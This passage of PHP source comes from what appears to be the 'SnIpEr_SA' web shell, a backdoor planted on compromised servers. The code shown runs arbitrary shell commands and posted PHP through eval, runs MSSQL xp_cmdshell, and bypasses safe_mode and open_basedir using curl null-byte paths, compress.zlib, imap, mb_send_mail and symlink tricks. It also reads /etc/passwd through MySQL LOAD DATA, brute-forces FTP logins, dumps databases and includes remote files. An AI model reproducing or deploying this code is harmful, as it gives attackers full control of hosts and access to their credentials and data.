4117	printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
4118	echo date("d.m.Y H:i ",$mtime);
4119	}
4120	echo "$file\n";
4121	}
4122	$d->close();
4123	}
4124	else echo $lang[$language._text29];
4125	break;
4126	}
4127	}
4128	else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump")&&($_POST['cmd']!="db_query")&&($_POST['cmd']!="ftp_brute")){
4129	$cmd_rep = ex($_POST['cmd']);
4130	if(!$unix) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; }
4131	else { echo @htmlspecialchars($cmd_rep)."\n"; }}
4132	if($_POST['cmd'])
4133	{
4134	switch($_POST['cmd'])
4135	{
4136	case 'test1':
4137	$ci = @curl_init("file://".$_POST['test1_file']."");
4138	$cf = @curl_exec($ci);
4139	echo $cf;
4140	break;
4141	case 'test2':
4142	@include($_POST['test2_file']);
4143	break;
4144	case 'mysqlb':
4145
4146	$mhost = "localhost";
4147	$muser = $_POST['test3_ml'];
4148	$mpass = $_POST['test3_mp'];
4149	$mdb = $_POST['test3_md'];
4150	$file = $_POST['test3_file'];
4151
4152	// default mysql_read files [seperated by: ':']:
4153	$mysql_files_str = "/etc/passwd:/proc/cpuinfo:/etc/resolv.conf:/etc/proftpd.conf";
4154	$mysql_files = explode(':', $mysql_files_str);
4155
4156
4157	$sql = array (
4158	"USE $mdb",
4159
4160	'CREATE TEMPORARY TABLE ' . ($tbl = 'A'.time ()) . ' (a LONGBLOB)',
4161
4162	"LOAD DATA LOCAL INFILE '$file' INTO TABLE $tbl FIELDS "
4163	. "TERMINATED BY '__THIS_NEVER_HAPPENS__' "
4164	. "ESCAPED BY '' "
4165	. "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'",
4166
4167	"SELECT a FROM $tbl LIMIT 1"
4168	);
4169
4170
4171	mysql_connect ($mhost, $muser, $mpass);
4172
4173	foreach ($sql as $statement) {
4174	$q = mysql_query ($statement);
4175
4176	if ($q == false) die (
4177	"FAILED: " . $statement . "\n" .
4178	"REASON: " . mysql_error () . "\n"
4179	);
4180
4181	if (! $r = @mysql_fetch_array ($q, MYSQL_NUM)) continue;
4182
4183	echo htmlspecialchars($r[0]);
4184	mysql_free_result ($q);
4185	}
4186
4187
4188	echo "</textarea>";
4189
4190	break;
4191	case 'test4':
4192	if(empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; }
4193	$db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']);
4194	if($db)
4195	{
4196	if(@mssql_select_db($_POST['test4_md'],$db))
4197	{
4198	@mssql_query("drop table SnIpEr_SA_temp_table",$db);
4199	@mssql_query("create table SnIpEr_SA_temp_table ( string VARCHAR (500) NULL)",$db);
4200	@mssql_query("insert into SnIpEr_SA_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db);
4201	$res = mssql_query("select * from SnIpEr_SA_temp_table",$db);
4202	while(($row=@mssql_fetch_row($res)))
4203	{
4204	echo $row[0]."\r\n";
4205	}
4206	@mssql_query("drop table SnIpEr_SA_temp_table",$db);
4207	}
4208	else echo "[-] ERROR! Can't select database";
4209	@mssql_close($db);
4210	}
4211	else echo "[-] ERROR! Can't connect to MSSQL server";
4212	break;
4213	case 'test5':
4214	if (@file_exists('/tmp/mb_send_mail')) @unlink('/tmp/mb_send_mail');
4215	$extra = "-C ".$_POST['test5_file']." -X /tmp/mb_send_mail";
4216	@mb_send_mail(NULL, NULL, NULL, NULL, $extra);
4217	$lines = file ('/tmp/mb_send_mail');
4218	foreach ($lines as $line) { echo htmlspecialchars($line)."\r\n"; }
4219	break;
4220	case 'test6':
4221	$stream = @imap_open('/etc/passwd', "", "");
4222	$dir_list = @imap_list($stream, trim($_POST['test6_file']), "*");
4223	for ($i = 0; $i < count($dir_list); $i++) echo $dir_list[$i]."\r\n";
4224	@imap_close($stream);
4225	break;
4226	case 'test7':
4227	$stream = @imap_open($_POST['test7_file'], "", "");
4228	$str = @imap_body($stream, 1);
4229	echo $str;
4230	@imap_close($stream);
4231	break;
4232	case 'test8':
4233	if(@copy("compress.zlib://".$_POST['test8_file1'], $_POST['test8_file2'])) echo $lang[$language.'_text118'];
4234	else echo $lang[$language.'_text119'];
4235	break;
4236	case 'cURL':
4237	if(empty($_POST['SnIpEr_SA'])){
4238
4239
4240	} else {
4241	$curl=$_POST['SnIpEr_SA'];
4242	$ch =curl_init("file:///".$curl."\x00/../../../../../../../../../../../../".__FILE__);
4243	curl_exec($ch);
4244	var_dump(curl_exec($ch));
4245	echo "</textarea></CENTER>";
4246
4247	}
4248	break;
4249	case 'copy':
4250
4251	if(empty($snn)){
4252	if(empty($_GET['snn'])){
4253	if(empty($_POST['snn'])){
4254
4255	} else {
4256	$u1p=$_POST['snn'];
4257	}
4258	} else {
4259	$u1p=$_GET['snn'];
4260	}
4261	}
4262	$u1p=""; // File to Include... or use _GET _POST
4263	$tymczas=""; // Set $tymczas to dir where you have 777 like /var/tmp
4264
4265
4266	$temp=tempnam($tymczas, "cx");
4267
4268	if(copy("compress.zlib://".$snn, $temp)){
4269	$zrodlo = fopen($temp, "r");
4270	$tekst = fread($zrodlo, filesize($temp));
4271	fclose($zrodlo);
4272	echo "".htmlspecialchars($tekst)."";
4273	unlink($temp);
4274	echo "</textarea></CENTER>";
4275	}
4276	break;
4277	case 'ini_restore':
4278	if(empty($_POST['ini_restore'])){
4279	} else {
4280
4281	$ini=$_POST['ini_restore'];
4282	echo ini_get("safe_mode");
4283	echo ini_get("open_basedir");
4284	require_once("$ini");
4285	ini_restore("safe_mode");
4286	ini_restore("open_basedir");
4287	echo ini_get("safe_mode");
4288	echo ini_get("open_basedir");
4289	include($_GET["ss"]);
4290	echo "</textarea></CENTER>";
4291	}
4292	break;
4293	case 'glob':
4294	function reg_glob()
4295	{
4296	$chemin=$_REQUEST['glob'];
4297	$files = glob("$chemin*");
4298
4299
4300	foreach ($files as $filename) {
4301
4302	echo "$filename\n";
4303
4304	}
4305	}
4306
4307	if(isset($_REQUEST['glob']))
4308	{
4309	reg_glob();
4310	}
4311
4312	break;
4313	case 'zend':
4314	if(empty($_POST['zend'])){
4315	} else {
4316
4317	$dezend=$_POST['zend'];
4318	include($_POST['zend']);
4319	print_r($GLOBALS);
4320	require_once("$dezend");
4321	echo "</textarea></p>";
4322	}
4323	break;
4324	case 'sym1':
4325	if(empty($_POST['sym1p'])){
4326	} else {
4327	$symp=$_POST['sym1p'];
4328	}
4329	if(empty($_POST['sym1p2'])){
4330
4331	} else {
4332	$symp2=$_POST['sym1p2'];
4333
4334	symlink("a/a/a/a/a/a/", "dummy");
4335	symlink("dummy".$symp2."".$symp."", "xxx");
4336	unlink("dummy");
4337	while (1) {
4338	symlink(".", "dummy");
4339
4340	}
4341	}
4342	break;
4343	case 'sym2':
4344	@include(xxx);
4345	break;
4346
4347	case 'plugin':
4348	if ($_POST['plugin'] ){
4349
4350
4351	for($uid=0;$uid<60000;$uid++){ //cat /etc/passwd
4352	$ara = posix_getpwuid($uid);
4353	if (!empty($ara)) {
4354	while (list ($key, $val) = each($ara)){
4355	print "$val:";
4356	}
4357	print "\n";
4358	}
4359	}
4360	echo "</textarea>";
4361
4362	}
4363	break;
4364	case 'command':
4365	if (!empty($_POST['command'])) {
4366
4367	if ($method=="system") {
4368	system($_POST['command']);
4369	echo "Functions system";
4370	}
4371	if ($method=="passthru") {
4372	passthru($_POST['command']);
4373	echo "Functions passthru";
4374	}
4375	if ($method=="exec") {
4376	$string = exec($_POST['command']);
4377	echo $string;
4378	echo "Functions exec";
4379
4380	}
4381	if ($method=="shell_exec") {
4382	$string = shell_exec($_POST['command']);
4383	echo $string;
4384	echo "Functions shell_exec";
4385	}
4386	if ($method=="popen") {
4387	$pp = popen($_POST['command'], 'r');
4388	$read = fread($pp, 2096);
4389	echo $read;
4390	pclose($pp);
4391	echo "Functions popen";
4392	}
4393
4394	if ($method=="proc_open") {
4395
4396
4397	$command = isset($_POST['command']) ? $_POST['command'] : '';
4398
4399
4400
4401	/* Load the configuration. */
4402
4403	/* Default settings --- these settings should always be set to something. */
4404
4405	/* Merge settings. */
4406
4407	session_start();
4408
4409
4410
4411	if (!empty($command)) {
4412	/* Save the command for late use in the JavaScript. If the command is
4413	* already in the history, then the old entry is removed before the
4414	* new entry is put into the list at the front. */
4415	if (($i = array_search($_POST['command'], $_SESSION['history'])) !== false)
4416	unset($_SESSION['history'][$i]);
4417
4418	array_unshift($_SESSION['history'], $_POST['command']);
4419
4420	/* Now append the commmand to the output. */
4421	$_SESSION['output'] .= '$ ' . $_POST['command'] . "\n";
4422
4423	/* Initialize the current working directory. */
4424	if (ereg('^[[:blank:]]cd[[:blank:]]$', $_POST['command'])) {
4425	$_SESSION['cwd'] = realpath($ini['settings']['home-directory']);
4426	} elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_POST['command'], $regs)) {
4427	/* The current command is a 'cd' command which we have to handle
4428	* as an internal shell command. */
4429
4430	if ($regs[1]{0} == '/') {
4431	/* Absolute path, we use it unchanged. */
4432	$new_dir = $regs[1];
4433	} else {
4434	/* Relative path, we append it to the current working
4435	* directory. */
4436	$new_dir = $_SESSION['cwd'] . '/' . $regs[1];
4437	}
4438
4439	/* Transform '/./' into '/' */
4440	while (strpos($new_dir, '/./') !== false)
4441	$new_dir = str_replace('/./', '/', $new_dir);
4442
4443	/* Transform '//' into '/' */
4444	while (strpos($new_dir, '//') !== false)
4445	$new_dir = str_replace('//', '/', $new_dir);
4446
4447	/* Transform 'x/..' into '' */
4448	while (preg_match('\|/\.\.(?!\.)\|', $new_dir))
4449	$new_dir = preg_replace('\|/?[^/]+/\.\.(?!\.)\|', '', $new_dir);
4450
4451	if ($new_dir == '') $new_dir = '/';
4452
4453	/* Try to change directory. */
4454	if (@chdir($new_dir)) {
4455	$_SESSION['cwd'] = $new_dir;
4456	} else {
4457	$_SESSION['output'] .= "cd: could not change to: $new_dir\n";
4458	}
4459
4460	} elseif (trim($_POST['command']) == 'exit') {
4461	logout();
4462	} else {
4463
4464	/* The command is not an internal command, so we execute it after
4465	* changing the directory and save the output. */
4466	chdir($_SESSION['cwd']);
4467
4468	// We canot use putenv() in safe mode.
4469	if (!ini_get('safe_mode')) {
4470	// Advice programs (ls for example) of the terminal size.
4471	putenv('ROWS=' . $rows);
4472	putenv('COLUMNS=' . $columns);
4473	}
4474
4475	/* Alias expansion. */
4476	$length = strcspn($_POST['command'], " \t");
4477	$token = substr($_POST['command'], 0, $length);
4478	if (isset($ini['aliases'][$token]))
4479	$command = $ini['aliases'][$token] . substr($_POST['command'], $length);
4480
4481	$io = array();
4482	$p = proc_open($_POST['command'],
4483	array(1 => array('pipe', 'w'),
4484	2 => array('pipe', 'w')),
4485	$io);
4486
4487	/* Read output sent to stdout. */
4488	while (!feof($io[1])) {
4489	$_SESSION['output'] .= htmlspecialchars(fgets($io[1]),
4490	ENT_COMPAT, 'UTF-8');
4491	}
4492	/* Read output sent to stderr. */
4493	while (!feof($io[2])) {
4494	$_SESSION['output'] .= htmlspecialchars(fgets($io[2]),
4495	ENT_COMPAT, 'UTF-8');
4496	}
4497
4498	fclose($io[1]);
4499	fclose($io[2]);
4500	proc_close($p);
4501	}
4502	}
4503
4504	/* Build the command history for use in the JavaScript */
4505	if (empty($_SESSION['history'])) {
4506	$js_command_hist = '""';
4507	} else {
4508	$escaped = array_map('addslashes', $_SESSION['history']);
4509	$js_command_hist = '"", "' . implode('", "', $escaped) . '"';
4510	}
4511	}
4512	}
4513
4514
4515	break;
4516	}
4517	}
4518
4519
4520
4521
4522
4523	if ($_POST['cmd']=="ftp_brute")
4524	{
4525	$suc = 0;
4526	foreach($users as $user)
4527	{
4528	$connection = @ftp_connect($ftp_server,$ftp_port,10);
4529	if(@ftp_login($connection,$user,$user)) { echo "[+] $user:$user - success\r\n"; $suc++; }
4530	else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user))) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; } }
4531	@ftp_close($connection);
4532	}
4533	echo "\r\n-------------------------------------\r\n";
4534	$count = count($users);
4535	if(isset($_POST['reverse'])) { $count *= 2; }
4536	echo $lang[$language.'_text97'].$count."\r\n";
4537	echo $lang[$language.'_text98'].$suc."\r\n";
4538	}
4539	if ($_POST['cmd']=="php_eval"){
4540	$eval = @str_replace("<?","",$_POST['php_eval']);
4541	$eval = @str_replace("?>","",$eval);
4542	@eval($eval);}
4543
4544	if ($_POST['cmd']=="mysql_dump")
4545	{
4546	if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
4547	$sql = new my_sql();
4548	$sql->db = $_POST['db'];
4549	$sql->host = $_POST['db_server'];
4550	$sql->port = $_POST['db_port'];
4551	$sql->user = $_POST['mysql_l'];
4552	$sql->pass = $_POST['mysql_p'];
4553	$sql->base = $_POST['mysql_db'];
4554	if(!$sql->connect()) { echo "[-] ERROR! Can't connect to SQL server"; }
4555	else if(!$sql->select_db()) { echo "[-] ERROR! Can't select database"; }
4556	else if(!$sql->dump($_POST['mysql_tbl'])) { echo "[-] ERROR! Can't create dump"; }
4557	else {
4558	if(empty($_POST['dif'])) { foreach($sql->dump as $v) echo $v."\r\n"; }
4559	else if($fp){ foreach($sql->dump as $v) @fputs($fp,$v."\r\n"); }
4560	else { echo "[-] ERROR! Can't write in dump file"; }
4561	}
4562	}
4563	echo "</textarea></div>";
4564	echo "</b>";
4565	echo "</td></tr></table>";
4566	echo "<table width=100% cellpadding=0 cellspacing=0>";
4567	function div_title($title, $id)
4568	{
4569	return '<a style="cursor: pointer;" onClick="change_divst(\''.$id.'\');">'.$title.'</a>';
4570	}
4571	function div($id)
4572	{
4573	if(isset($_COOKIE[$id]) && $_COOKIE[$id]==0) return '<div id="'.$id.'" style="display: none;">';
4574	return '<div id="'.$id.'">';
4575	}
4576
4577
4578	if(!$safe_mode){
4579	echo $fs.$table_up1.div_title($lang[$language.'_text2'],'id1').$table_up2.div('id1').$ts;
4580	echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,''));
4581	echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
4582	echo $te.'</div>'.$table_end1.$fe;
4583	}
4584	else{
4585	echo $fs.$table_up1.div_title($lang[$language.'_text28'],'id2').$table_up2.div('id2').$ts;
4586	echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6']));
4587	echo $te.'</div>'.$table_end1.$fe;
4588	}
4589	echo $fs.$table_up1.div_title($lang[$language.'_text208'],'id15').$table_up2.div('id15').$ts;
4590	echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select name=\"method\">
4591	<option value=\"system\" <? if ($method==\"system\") { echo \"selected\"; } ?>system</option>
4592	<option value=\"passthru\" <? if ($method==\"passthru\") { echo \"selected\"; } ?>passthru</option>
4593	<option value=\"exec\" <? if ($method==\"exec\") { echo \"selected\"; } ?>exec</option>
4594	<option value=\"shell_exec\" <? if ($method==\"shell_exec\") { echo \"selected\"; } ?>shell_exec</option>
4595	<option value=\"popen\" <? if ($method==\"popen\") { echo \"selected\"; } ?>popen</option>
4596	<option value=\"proc_open\" <? if ($method==\"proc_open\") { echo \"selected\"; } ?>proc_open</option>
4597	</select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text3'].$arrow."</b>".in('text','command',54,(!empty($_POST['command'])?($_POST['command']):("id"))).in('hidden','cmd',0,'command').ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
4598	echo $te.'</div>'.$table_end1.$fe;
4599
4600	echo $fs.$table_up1.div_title($lang[$language.'_text223'],'id5').$table_up2.div('id5').$ts;
4601	echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select name=\"method\">
4602	<option value=\"file\" <? if ($method==\"file\") { echo \"selected\"; } ?> file</option>
4603	<option value=\"fread\" <? if ($method==\"fread\") { echo \"selected\"; } ?> fread</option>
4604	<option value=\"show_source\" <? if ($method==\"show_source\") { echo \"selected\"; } ?> show_source</option>
4605	<option value=\"readfile\" <? if ($method==\"readfile\") { echo \"selected\"; } ?> readfile</option>
4606	</select>".in('hidden','file',0,$dir).ws(2)."<b>".$lang[$language.'_text202'].$arrow."</b>".in('text','file',41,'/etc/passwd').ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
4607	echo $te.'</div>'.$table_end1.$fe;
4608	echo $fs.$table_up1.div_title($lang[$language.'_text42'],'id3').$table_up2.div('id3').$ts;
4609	echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11']));
4610	echo $te.'</div>'.$table_end1.$fe;
4611
4612	echo $fs.$table_up1.div_title($lang[$language.'_text200'],'id3').$table_up2.div('id3').$ts;
4613	echo sr(15,"<b>".$lang[$language.'_text202'].$arrow."</b>",in('text','snn',85,'/etc/passwd').in('hidden','cmd',0,'copy').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
4614	echo $te.'</div>'.$table_end1.$fe;
4615	echo $fs.$table_up1.div_title($lang[$language.'_text300'],'id3').$table_up2.div('id3').$ts;
4616	echo sr(15,"<b>".$lang[$language.'_text202'].$arrow."</b>",in('text','SnIpEr_SA',85,'/etc/passwd').in('hidden','cmd',0,'cURL').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
4617	echo $te.'</div>'.$table_end1.$fe;
4618	echo $fs.$table_up1.div_title($lang[$language.'_text203'],'id3').$table_up2.div('id3').$ts;
4619	echo sr(15,"<b>".$lang[$language.'_text202'].$arrow."</b>",in('text','ini_restore',85,'/etc/passwd').in('hidden','cmd',0,'ini_restore').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
4620	echo $te.'</div>'.$table_end1.$fe;
4621	echo $fs.$table_up1.div_title($lang[$language.'_text224'],'id3').$table_up2.div('id3').$ts;
4622	echo sr(15,"<b>".$lang[$language.'_text202'].$arrow."</b>","<select size=\"1\" name=\"plugin\"><option value=\"plugin\">/etc/passwd</option></option></select>".in('hidden','cmd',0,'plugin').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
4623	echo $te.'</div>'.$table_end1.$fe;
4624	echo $fs.$table_up1.div_title($lang[$language.'_text35'],'id12').$table_up2.div('id12').$ts;
4625	echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>");
4626	echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysqlb').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
4627	echo $te.'</div>'.$table_end1.$fe;
4628	echo $fs.$table_up1.div_title($lang[$language.'_text220'],'id3').$table_up2.div('id3').$ts;
4629	echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','sym1p2',50,(!empty($_POST['sym1p2'])?($_POST['sym1p']):("/../../../"))).in('text','sym1p',50,(!empty($_POST['sym1p'])?($_POST['sym1p']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'sym1').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
4630	echo $te.'</div>'.$table_end1.$fe;
4631	echo $fs.$table_up1.div_title($lang[$language.'_text222'],'id3').$table_up2.div('id3').$ts;
4632	echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('hidden','dir',0,$dir).in('hidden','cmd',0,'sym2').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
4633	echo $te.'</div>'.$table_end1.$fe;
4634
4635	{
4636	echo $fs.$table_up1.div_title($lang[$language.'_text204'],'id23').$table_up2.div('id23').$ts;
4637	echo sr(15,"<b>".$lang[$language.'_text205'].$arrow."</b>",in('text','log',96,(!empty($_POST['log'])?($_POST['log']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'Êã ÒÑÚ ÇáÔá æÈÅãßÇäß ÇÓÊÎÏÇãå filename.php?ss=http://shell.txt?').ws(4).in('submit','submit',0,$lang[$language.'_butt65']));
4638	echo $te.'</div>'.$table_end1.$fe;
4639	echo $fs.$table_up1.div_title($lang[$language.'_text207'],'id3').$table_up2.div('id3').$ts;
4640	echo sr(15,"<b>".$lang[$language.'_text206'].$arrow."</b>",in('text','glob',85,'/etc/').in('hidden','cmd',0,'glob').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
4641	echo $te.'</div>'.$table_end1.$fe;
4642	echo $fs.$table_up1.div_title($lang[$language.'_text209'],'id3').$table_up2.div('id3').$ts;
4643	echo sr(15,"<b>".$lang[$language.'_text206'].$arrow."</b>",in('text','root',85,'/etc/').in('hidden','cmd',0,'root').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
4644	echo $te.'</div>'.$table_end1.$fe;
4645
4646	echo $fs.$table_up1.div_title($lang[$language.'_text210'],'id11').$table_up2.div('id11').$ts;
4647	echo "<table class=table1 width=100% align=center>";
4648	echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','zend',85,(!empty($_POST['zend'])?($_POST['zend']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'zend').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
4649	echo $te.'</div>'.$table_end1.$fe;
4650
4651	echo $table_up1.div_title($lang[$language.'_text211'],'id21').$table_up2.div('id21').$ts."<tr>".$fs."<td valign=top width=34%>".$ts;
4652	echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text212']."</div></b></font>";
4653	echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>",in('text','php_ini1',10,'php.ini').ws(4).in('submit','submit',0,$lang[$language.'_butt65']));
4654	echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text213']."</div></b></font>";
4655	echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>",in('text','htacces',10,'htaccess').ws(4).in('submit','submit',0,$lang[$language.'_butt65']));
4656	echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text218']."</div></b></font>";
4657	echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>",in('text','file_ini',10,'ini.php').ws(4).in('submit','submit',0,$lang[$language.'_butt65']));
4658	echo $te.'</div>'.$table_end1.$fe;
4659	echo $fs.$table_up1.div_title($lang[$language.'_text221'],'id15').$table_up2.div('id15').$ts;
4660	echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>",in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','funzip',78,"$dir/file"));
4661	echo sr(15,"<b>".$lang[$language.'_text65'].$arrow."</b>",in('text','fzip',105,"$dir/sploitz.zip").ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
4662	echo $te.'</div>'.$table_end1.$fe;
4663	echo $fs.$table_up1.div_title($lang[$language.'_text219'],'id15').$table_up2.div('id15').$ts;
4664	echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>",in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','filefrom',78,'http://website.com/file.txt'));
4665	echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('text','fileto',105,filename_.php).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
4666	echo $te.'</div>'.$table_end1.$fe;
4667
4668	$aliases2 = '';
4669	foreach ($aliases as $alias_name=>$alias_cmd)
4670	{
4671	$aliases2 .= "<option>$alias_name</option>";
4672	}
4673	echo $fs.$table_up1.div_title($lang[$language.'_text7'],'id6').$table_up2.div('id6').$ts;
4674	echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
4675	echo $te.'</div>'.$table_end1.$fe;
4676
4677	}
4678
4679	if($safe_mode){
4680	echo $fs.$table_up1.div_title($lang[$language.'_text57'],'id4').$table_up2.div('id4').$ts;
4681	echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13']));
4682	echo $te.'</div>'.$table_end1.$fe;
4683	}
4684	if($safe_mode && $unix){
4685	echo $fs.$table_up1.div_title($lang[$language.'_text67'],'id5').$table_up2.div('id5').$ts;
4686	echo sr(15,"<b>".$lang[$language.'_text68'].$arrow."</b>","<select name=what><option value=mod>CHMOD</option><option value=own>CHOWN</option><option value=grp>CHGRP</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):("filename"))).ws(2)."<b>".$lang[$language.'_text70'].$arrow."</b>".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
4687	echo $te.'</div>'.$table_end1.$fe;
4688	}
4689	if($safe_mode){
4690
4691	echo $fs.$table_up1.div_title($lang[$language.'_text54'],'id7').$table_up2.div('id7').$ts;
4692	echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
4693	echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
4694	echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir));
4695	echo $te.'</div>'.$table_end1.$fe;
4696	if(!$safe_mode && $unix){
4697	echo $fs.$table_up1.div_title($lang[$language.'_text76'],'id8').$table_up2.div('id8').$ts;
4698	echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
4699	echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
4700	echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir));
4701	echo $te.'</div>'.$table_end1.$fe;
4702	}
4703	echo $fs.$table_up1.div_title($lang[$language.'_text32'],'id9').$table_up2.$font;
4704	echo "<div align=center>".div('id9')."<textarea name=php_eval cols=100 rows=3>";
4705	echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("/* delete script */\r\n//unlink(\"sniper_sa.php\");\r\n//readfile(\"/etc/passwd\");"));
4706	echo "</textarea>";
4707	echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval');
4708	echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']);
4709	echo "</div></div></font>";
4710	echo $table_end1.$fe;
4711	if($safe_mode&&$curl_on)
4712	{
4713	echo $fs.$table_up1.div_title($lang[$language.'_text33'],'id10').$table_up2.div('id10').$ts;
4714	echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
4715	echo $te.'</div>'.$table_end1.$fe;
4716	}
4717	}
4718	if($safe_mode)
4719	{
4720	echo $fs.$table_up1.div_title($lang[$language.'_text34'],'id11').$table_up2.div('id11').$ts;
4721	echo "<table class=table1 width=100% align=center>";
4722	echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
4723	echo $te.'</div>'.$table_end1.$fe;
4724	}
4725
4726
4727	if($safe_mode&&$mssql_on)
4728	{
4729	echo $fs.$table_up1.div_title($lang[$language.'_text85'],'id13').$table_up2.div('id13').$ts;
